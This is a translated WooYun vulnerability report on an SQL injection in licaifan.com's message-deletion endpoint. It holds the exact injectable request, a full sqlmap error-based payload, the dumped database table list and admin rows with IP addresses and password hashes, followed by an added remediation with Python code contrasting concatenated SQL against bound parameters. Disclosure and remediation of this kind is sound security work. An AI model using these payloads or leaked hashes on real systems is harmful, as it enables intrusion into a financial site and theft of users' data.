
Vulnerability summary

Defect ID: wooyun-2015-0115603

Title: A vulnerability in Licaifan (理财范) can leak all information about all users

Vendor: licaifan.com

Author: 追逐影子的人

Submitted: 2015-06-08 09:54

Fix time: 2015-07-23 10:14

Published: 2015-07-23 10:14

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-06-08: Details sent to the vendor, awaiting vendor handling
2015-06-08: Vendor confirmed; details disclosed to the vendor only
2015-06-18: Details disclosed to core white hats and domain experts
2015-06-28: Details disclosed to regular white hats
2015-07-08: Details disclosed to intern white hats
2015-07-23: Details disclosed to the public

Brief description:

I'm a P2P (皮吐皮) bandwagon kid.

Detailed description:

After logging in, open the messages page; messages can be deleted from there.

[Screenshot: Snip20150522_1.png]

The delete request is:
POST http://www.licaifan.com:80/user/delMessage
msg_id=1111&action=delete

The msg_id parameter is SQL-injectable; sqlmap confirms an error-based injection against the MySQL back end (output below).

[Screenshot: Snip20150522_2.png]

Proof of vulnerability:

web application technology: PHP 5.3.3, Nginx
back-end DBMS: MySQL 5.0
available databases [3]:
[*] information_schema
[*] licaifan
[*] test

Database: licaifan
[104 tables]
+--------------------------+
| YiiSession |
| user |
| account |
| account_cash |
| account_log_150202 |
| account_recharge |
| adm_admin |
| adm_award_log |
| adm_company_users |
| adm_email_template |
| adm_login_record |
| adm_logs |
| adm_other_type |
| area |
| award_log |
| card_auth |
| consumer_credit_gain_log |
| consumer_invest_log |
| cps_lanlicai |
| error |
| exp_code |
| exp_winner |
| frozen_log |
| hlf |
| hlf_invest_detail_1900 |
| hlf_invest_log |
| incubator_apply |
| invest_bonus_log |
| invest_bonus_log_bak |
| invest_log |
| invest_log_bak |
| invest_view |
| ios_download |
| ios_push |
| lease_gain_log |
| lease_invest_log |
| lease_project |
| lease_project_payment |
| lease_project_repayment |
| loan_application |
| login_record |
| meet_apply |
| message |
| mobile_area |
| mobile_change_log |
| nation |
| net_invest_log |
| oauth_access_tokens |
| oauth_clients |
| oauth_jwt |
| oauth_refresh_tokens |
| oauth_scopes |
| oneYearCoupons |
| payment |
| project_apply |
| project_award |
| project_comment |
| project_company |
| project_gain_record |
| project_invest_record |
| project_payment |
| project_pic |
| project_project |
| project_related |
| project_repayment |
| project_transfer |
| project_transfer2 |
| project_view |
| project_vouch |
| protected_answer |
| protected_questions |
| recharge_info_log |
| redemption |
| redemption_detail |
| remindmsg_log |
| research |
| score_log |
| score_setting |
| score_to_money |
| service_log |
| sms_code_check_record |
| sms_send_log |
| supertracker |
| system_setting |
| trade_gain_log |
| trade_invest_log |
| trade_project |
| trade_project_payment |
| trade_project_repayment |
| transfer_available |
| transfer_log |
| upload_pic |
| user_auth |
| user_extend_mobile |
| user_login_log |
| user_qq_userinfo |
| user_refer |
| user_remind |
| user_sina_userinfo |
| user_tzj |
| user_weixin_userinfo |
| vouch_pic |
| whos_online |
| withdraw_log |
+--------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: msg_id (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: msg_id=111) AND (SELECT 9995 FROM(SELECT COUNT(*),CONCAT(0x717a627a71,(SELECT (ELT(9995=9995,1))),0x7178787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (6820=6820&action=delete
---
web application technology: PHP 5.3.3, Nginx
back-end DBMS: MySQL >= 5.0.0
Database: licaifan
Table: system_setting
[15 entries]
+----+-----------------------+----------+--------------------------------------------+
| id | type                  | value    | description                                |
+----+-----------------------+----------+--------------------------------------------+
| 1  | invest_threshold      | 1000     | minimum investment is 1000 yuan            |
| 2  | itemsPerPageInAccount | 10       | items per page in account management       |
| 3  |                       | 10       | messages per page                          |
| 4  | announcement          | <blank>  | site announcement                          |
| 5  | minimum_withdraw      |          | minimum withdrawal amount                  |
| 6  | payment               | pay19    | 19Pay (一九付)                              |
| 7  | lucky                 | 1403     | NULL                                       |
| 8  | withdraw_fee_type     |          | how the withdrawal fee is charged          |
| 9  | repayment             |          | 19Pay (一九付)                              |
| 10 | wappayment            |          | LianLian Pay (连连支付)                      |
| 11 | payment_bak           | shengpay |                                            |
| 12 | payment_verify        | llpay    | LianLian Pay (连连支付)                      |
| 13 | apppayment            | wap      | client-app top-up channel                  |
| 14 | coupon_probability    | 100      | anniversary red-envelope campaign win rate |
| 15 | withdraw_fee_number   | 3        | number of fee-free withdrawals             |
+----+-----------------------+----------+--------------------------------------------+
Database: licaifan
Table: adm_admin
[36 entries]
+----------+-----------------+--------+---------------------+------------+------------------------------------------+
| admin_id | addip | status | addtime | userName | userPassword |
+----------+-----------------+--------+---------------------+------------+------------------------------------------+
| | 203.100.80.24 | 1 | | admin | |
| 1 | 106.185.46.44 | 1 | | | 9f59c01c21bea721ca5cbba9984cd25e1c479a18 |
| | 203.100.93.15 | | 2014-10-29 10:05:22 | | |
| | 203.100.93.15 | | | | |
| | 106.120.244.158 | | 2014-09-29 18:11:27 | | |
| 1 | | | | | 79759dbab437869857f4443d81a3e25f9e9b2300 |
| 1 | | | | | |
| 1 | 203.100.93.15 | | | | |
| 1 | | | | | |
| | | | 2015-02-15 11:15:53 | luoxin | |
| | | 1 |


All users' usernames and passwords, identity details, bank card information, transaction passwords, phone numbers, account balances and so on can be obtained.

Remediation:

Use the framework's own query methods with bound parameters instead of concatenating msg_id into the SQL string (the YiiSession table suggests the site runs on Yii, whose database layer supports parameter binding). As defence in depth, cast msg_id to an integer before use and scope the DELETE to messages owned by the logged-in user.
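As an added example (not code from the original report or from licaifan.com), the block below models the bug class behind the msg_id parameter and the parameterized fix, using an in-memory SQLite table. The `message` table, its column names and the exact shape of the DELETE statement are assumptions: the parenthesised `(msg_id=...) AND (...)` form is inferred from the sqlmap payload above, which closes a parenthesis before its injected AND and reopens one at the end. It also decodes the two hex literals in that payload, which are the marker strings sqlmap wraps around the value it extracts from MySQL's "Duplicate entry" error.

```python
import re
import sqlite3

# The error-based payload quoted in the sqlmap output above.
SQLMAP_PAYLOAD = (
    "111) AND (SELECT 9995 FROM(SELECT COUNT(*),CONCAT(0x717a627a71,"
    "(SELECT (ELT(9995=9995,1))),0x7178787171,FLOOR(RAND(0)*2))x "
    "FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (6820=6820"
)


def decode_markers(payload):
    """Decode the hex string literals in a sqlmap error-based payload.

    sqlmap wraps the value it wants (here the ELT() probe) between two
    random marker strings so it can grep the value out of MySQL's
    "Duplicate entry '...' for key 'group_key'" error message.
    """
    return [bytes.fromhex(h).decode("ascii")
            for h in re.findall(r"0x([0-9a-fA-F]+)", payload)]


def make_db():
    """Constructed fixture standing in for the site's `message` table.
    The real schema is not on the page; these columns are assumptions."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE message (msg_id INTEGER PRIMARY KEY, user_id INTEGER, body TEXT)")
    db.executemany("INSERT INTO message VALUES (?, ?, ?)", [
        (1111, 7, "own message"),
        (1112, 7, "another own message"),
        (2000, 8, "some other user's message"),
    ])
    db.commit()
    return db


def del_message_vulnerable(db, user_id, msg_id):
    """Model of the bug class: msg_id is pasted into the SQL text.

    The `(msg_id=...) AND (...)` shape is an assumption inferred from the
    sqlmap payload, which closes a parenthesis before its injected AND and
    reopens one at the end. Returns the number of rows deleted.
    """
    sql = "DELETE FROM message WHERE (msg_id=%s) AND (user_id=%d)" % (msg_id, user_id)
    cur = db.execute(sql)
    db.commit()
    return cur.rowcount


def del_message_fixed(db, user_id, msg_id):
    """Hardened version: msg_id travels as a bound parameter, never as SQL."""
    cur = db.execute(
        "DELETE FROM message WHERE msg_id=? AND user_id=?", (msg_id, user_id))
    db.commit()
    return cur.rowcount


def remaining(db):
    """msg_ids still present, in order."""
    return [row[0] for row in db.execute("SELECT msg_id FROM message ORDER BY msg_id")]


def demo():
    """Run both handlers against a benign and a hostile msg_id.
    Returns {case: (rows_deleted, msg_ids_left)}."""
    # Closes the parenthesis, ORs in a tautology, comments out the ownership check.
    hostile = "0) OR 1=1 -- "
    results = {}

    db = make_db()
    results["vuln_benign"] = (del_message_vulnerable(db, 7, "1111"), remaining(db))
    # -> (1, [1112, 2000]): user 7 deletes only their own message 1111

    db = make_db()
    results["vuln_hostile"] = (del_message_vulnerable(db, 7, hostile), remaining(db))
    # -> (3, []): every user's messages are gone

    db = make_db()
    results["fixed_hostile"] = (del_message_fixed(db, 7, hostile), remaining(db))
    # -> (0, [1111, 1112, 2000]): compared as a literal, matches nothing

    db = make_db()
    results["fixed_benign"] = (del_message_fixed(db, 7, 1111), remaining(db))
    # -> (1, [1112, 2000])

    return results


if __name__ == "__main__":
    print("sqlmap markers:", decode_markers(SQLMAP_PAYLOAD))
    for case, (deleted, left) in demo().items():
        print(f"{case:14s} deleted={deleted} remaining={left}")
```

The hostile string is a deliberately simple tautology rather than sqlmap's double-query trick; the point it makes is the same one the report does, that whatever is concatenated into the WHERE clause is executed as SQL, while the bound-parameter version treats the identical bytes as a value the ownership check still constrains.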

Copyright notice: when reposting, credit the source: 追逐影子的人@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmed: 2015-06-08 10:13

Vendor reply:

Many thanks to the vulnerability author for raising such an important issue with us~ We will check our own website to prevent this kind of vulnerability from appearing!!

Latest status:

None yet